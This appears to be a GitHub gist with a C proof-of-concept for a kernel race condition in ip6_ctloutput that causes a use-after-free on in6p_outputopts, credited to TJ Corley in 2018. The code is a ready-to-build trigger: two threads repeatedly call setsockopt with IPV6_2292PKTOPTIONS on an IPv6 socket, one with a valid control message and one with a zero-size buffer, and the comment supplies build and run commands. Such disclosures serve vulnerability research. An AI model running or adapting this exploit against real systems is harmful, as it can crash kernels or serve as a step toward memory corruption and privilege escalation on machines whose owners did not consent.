| /* | |
| * Race condition in ip6_ctloutput where in6p is not locked when calling | |
| * ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts | |
| * | |
| * Build: gcc -std=c99 -o poc poc.c -lpthread | |
| * Run: ./poc | |
| * | |
| * Discovered by TJ Corley 8/15/2018 | |
| */ | |
| #include <netinet/in.h> | |
| #include <pthread.h> | |
| #include <stdio.h> | |
| #include <sys/socket.h> | |
| #include <sys/types.h> | |
| #define IPV6_2292PKTOPTIONS 25 | |
| int s; | |
| static void spam_valid() { | |
| char ctrl[CMSG_SPACE(sizeof(int))]; | |
| struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl; | |
| cmsg->cmsg_len = CMSG_LEN(4); | |
| cmsg->cmsg_level = IPPROTO_IPV6; | |
| cmsg->cmsg_type = IPV6_TCLASS; | |
| char *data = (char *)CMSG_DATA(cmsg); | |
| *(int *)data = 0x4; | |
| printf("spamming valid IPV6_2292PKTOPTIONS\n"); | |
| for (;;) { | |
| setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4)); | |
| } | |
| } | |
| static void spam_zero_size_mbuf() { | |
| char *buf[0x4] = {}; | |
| printf("spamming zero size mbuf\n"); | |
| for (;;) { | |
| setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0); | |
| } | |
| } | |
| int main() { | |
| pthread_t t; | |
| s = socket(AF_INET6, SOCK_DGRAM, 0); | |
| pthread_create(&t, NULL, (void *)spam_valid, NULL); | |
| spam_zero_size_mbuf(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment